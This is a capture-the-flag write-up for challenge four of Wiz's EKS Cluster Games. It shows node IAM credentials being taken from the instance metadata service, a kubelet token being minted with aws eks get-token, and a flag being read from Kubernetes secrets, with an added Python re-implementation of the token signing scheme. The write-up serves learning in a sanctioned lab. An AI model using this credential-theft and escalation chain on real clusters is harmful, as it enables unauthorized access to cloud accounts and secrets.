EKS Cluster Games: Challenge 4 (SPOILERS)
Nov 2, 2023

This is a writeup of how I solved part four of the EKS Cluster Games. Huge thanks to Wiz for putting this together.

If you haven’t yet, you should start with challenges one, two, and three.

Challenge Four

This time the pod's service account has no permissions at all; the only thing it can tell us is its own name, which the Forbidden error repeats:

root@wiz-eks-challenge:~# kubectl whoami
system:serviceaccount:challenge4:service-account-challenge4

root@wiz-eks-challenge:~# kubectl get pods
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:challenge4:service-account-challenge4" cannot list resource "pods" in API group "" in the namespace "challenge4"

We still have access to the IMDSv1 endpoint from the pod, and this time the instance profile hands us temporary credentials for the node's own IAM role (IMDS serves them under /latest/meta-data/iam/security-credentials/ to any process that can reach 169.254.169.254). Exporting those credentials makes the AWS CLI act as the node:

root@wiz-eks-challenge:~# curl

root@wiz-eks-challenge:~# aws sts get-caller-identity
{
    "UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0cb922c6673973282",
    "Account": "688655246681",
    "Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282"
}

Escalating to the Kubelet Identity

Instead of poking around AWS, let's use this role to reach the Kubernetes API as the node (kubelet) identity. EKS authenticates IAM principals through aws-iam-authenticator: the client presigns an STS GetCallerIdentity request with the cluster name carried in a signed x-k8s-aws-id header, the API server replays that request to STS to learn the caller's ARN, and the aws-auth ConfigMap maps the ARN to a Kubernetes user and groups. A managed node group's NodeInstanceRole, which is what we are holding, is mapped there into the system:nodes group. aws eks get-token mints exactly that token. The cluster name has to be right, because it is bound into the signature and the API server will use its own name when replaying, but the IAM role name above (eks-challenge-cluster-nodegroup-NodeInstanceRole) strongly suggests it is eks-challenge-cluster:

root@wiz-eks-challenge:~# TOKEN="$(aws eks get-token --cluster-name eks-challenge-cluster | jq -r .status.token)"

root@wiz-eks-challenge:~# kubectl whoami --token "$TOKEN"
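
To make the token step above concrete, here is an added, from-scratch re-implementation of the k8s-aws-v1 token scheme that aws eks get-token produces. It is example code written for this writeup, not code from the original post, from Wiz, or from the aws-iam-authenticator project; the credentials in it are constructed placeholders and the region, expiry and STS host are assumptions. It builds the presigned GetCallerIdentity URL, shows that the cluster name never appears in the URL itself, and simulates the signature check STS performs when the API server replays the request with its own x-k8s-aws-id header, which is why a token signed for the wrong cluster name is rejected.

```python
"""Illustrative re-implementation of the aws-iam-authenticator token format.

Added example for this writeup; not the original post's code and not the
aws-iam-authenticator project's code. Region, host and expiry are assumptions.
"""
import base64
import datetime as dt
import hashlib
import hmac
import urllib.parse

# Constructed, non-functional credentials for offline demonstration only.
EXAMPLE_CREDS = {
    "access_key": "ASIAEXAMPLEEXAMPLE12",
    "secret_key": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
    "session_token": "FwoGZXIvYXdzEXAMPLESESSIONTOKEN+/==",
}
SIGNED_HEADERS = "host;x-k8s-aws-id"          # the cluster name rides in this header
EMPTY_PAYLOAD_HASH = hashlib.sha256(b"").hexdigest()  # GET request, no body


def _hmac(key: bytes, msg: str) -> bytes:
    return hmac.new(key, msg.encode(), hashlib.sha256).digest()


def _canonical_query(params: dict) -> str:
    def q(s: str) -> str:
        return urllib.parse.quote(s, safe="-_.~")   # SigV4: encode everything else
    return "&".join(f"{q(k)}={q(v)}" for k, v in sorted(params.items()))


def _signature(secret_key: str, host: str, region: str, cluster_name: str, params: dict) -> str:
    """SigV4 signature over GET /?<params> with host and x-k8s-aws-id as signed headers."""
    amz_date = params["X-Amz-Date"]
    date = amz_date[:8]
    scope = f"{date}/{region}/sts/aws4_request"
    canonical_request = "\n".join([
        "GET", "/", _canonical_query(params),
        f"host:{host}\nx-k8s-aws-id:{cluster_name}\n",  # header values are signed
        SIGNED_HEADERS, EMPTY_PAYLOAD_HASH,
    ])
    string_to_sign = "\n".join([
        "AWS4-HMAC-SHA256", amz_date, scope,
        hashlib.sha256(canonical_request.encode()).hexdigest(),
    ])
    key = _hmac(("AWS4" + secret_key).encode(), date)
    for part in (region, "sts", "aws4_request"):
        key = _hmac(key, part)
    return hmac.new(key, string_to_sign.encode(), hashlib.sha256).hexdigest()


def build_token(creds: dict, cluster_name: str, region: str = "us-west-1",
                now=None, expires: int = 60) -> str:
    """Return a k8s-aws-v1 bearer token: base64url of a presigned STS GetCallerIdentity URL."""
    now = now or dt.datetime.now(dt.timezone.utc)
    host = f"sts.{region}.amazonaws.com"      # assumed regional STS endpoint
    date = now.strftime("%Y%m%d")
    params = {
        "Action": "GetCallerIdentity",
        "Version": "2011-06-15",
        "X-Amz-Algorithm": "AWS4-HMAC-SHA256",
        "X-Amz-Credential": f"{creds['access_key']}/{date}/{region}/sts/aws4_request",
        "X-Amz-Date": now.strftime("%Y%m%dT%H%M%SZ"),
        "X-Amz-Expires": str(expires),
        "X-Amz-SignedHeaders": SIGNED_HEADERS,
    }
    if creds.get("session_token"):            # instance-role creds are temporary
        params["X-Amz-Security-Token"] = creds["session_token"]
    sig = _signature(creds["secret_key"], host, region, cluster_name, params)
    url = f"https://{host}/?{_canonical_query(params)}&X-Amz-Signature={sig}"
    return "k8s-aws-v1." + base64.urlsafe_b64encode(url.encode()).decode().rstrip("=")


def decode_token(token: str):
    """Undo the encoding; returns (url, query params). The cluster name is not in here."""
    if not token.startswith("k8s-aws-v1."):
        raise ValueError("not a k8s-aws-v1 token")
    b64 = token[len("k8s-aws-v1."):]
    url = base64.urlsafe_b64decode(b64 + "=" * (-len(b64) % 4)).decode()
    parsed = urllib.parse.urlparse(url)
    return url, dict(urllib.parse.parse_qsl(parsed.query, keep_blank_values=True))


def sts_would_accept(token: str, creds: dict, cluster_name: str) -> bool:
    """Simulate STS verifying the replayed request that the API server sends with
    its own `x-k8s-aws-id: <cluster_name>` header. Only STS (and the caller) know
    the secret key, so this is what decides whether --cluster-name was right."""
    url, params = decode_token(token)
    host = urllib.parse.urlparse(url).netloc
    region = params["X-Amz-Credential"].split("/")[2]
    presented = params.pop("X-Amz-Signature")
    expected = _signature(creds["secret_key"], host, region, cluster_name, params)
    return hmac.compare_digest(presented, expected)


if __name__ == "__main__":
    tok = build_token(EXAMPLE_CREDS, "eks-challenge-cluster")
    url, params = decode_token(tok)
    print(url)
    print("accepted for eks-challenge-cluster:", sts_would_accept(tok, EXAMPLE_CREDS, "eks-challenge-cluster"))
    print("accepted for other-cluster:        ", sts_would_accept(tok, EXAMPLE_CREDS, "other-cluster"))
```

Running it prints the presigned URL and then True/False: the same token verifies only when STS is handed the cluster name it was signed for. That is the whole reason the --cluster-name guess matters, and also why a captured token cannot be replayed against a differently named cluster even with identical IAM mappings.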

Finding the Flag

The first thing to try with a node identity is reading secrets. In a stock cluster the Node authorizer only lets a kubelet get the individual secrets referenced by pods scheduled onto that node, so a namespace-wide list would normally be denied; the challenge cluster is more permissive, and the request yields an immediate reward:

root@wiz-eks-challenge:~# kubectl --token "$TOKEN" get secrets
NAME        TYPE     DATA   AGE
node-flag   Opaque   1      27h

root@wiz-eks-challenge:~# kubectl --token "$TOKEN" get secrets -o json | jq -r '.items[].data.flag' | base64 -d


Notes for challenge five.
